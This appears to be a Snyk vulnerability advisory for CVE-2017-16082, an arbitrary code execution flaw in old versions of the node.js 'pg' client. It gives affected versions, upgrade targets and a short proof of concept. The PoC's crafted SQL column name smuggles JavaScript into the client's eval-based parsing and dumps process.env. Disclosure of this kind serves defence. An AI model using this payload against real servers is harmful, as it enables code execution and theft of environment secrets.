Arbitrary Code Execution Affecting pg package, versions <2.11.2>=3.0.0 <3.6.4>=4.0.0 <4.5.7>=5.0.0 <5.2.1>=6.0.0 <6.0.5>=6.1.0 <6.1.6>=6.2.0 <6.2.5>=6.3.0 <6.3.3>=6.4.0 <6.4.2>=7.0.0 <7.0.2>=7.1.0 <7.1.2


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Mature
EPSS
15.82% (96th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDnpm:pg:20170813
  • published13 Aug 2017
  • disclosed13 Aug 2017
  • creditSehrope Sarkuni

Introduced: 13 Aug 2017

CVE-2017-16082  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

Upgrade pg to version 2.11.2, 3.6.4, 4.5.7, 5.2.1, 6.0.5, 6.1.6, 6.2.5, 6.3.3, 6.4.2, 7.0.2, 7.1.2 or higher.

Overview

pg is a non-blocking PostgreSQL client for node.js.

Affected versions of this package are vulnerable to Arbitrary Code Execution. When parsing results of a query, it goes through a form of eval, and with a specially crafted column name, an attacker can cause code to run remotely on the server.

PoC:

const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = SELECT 1 AS &quot;\\&#39;/*&quot;, 2 AS &quot;\\&#39;*/\n + console.log(process.env)] = null;\n//&quot;

client.query(sql, (err, res) => { client.end() });

CVSS Scores

version 3.1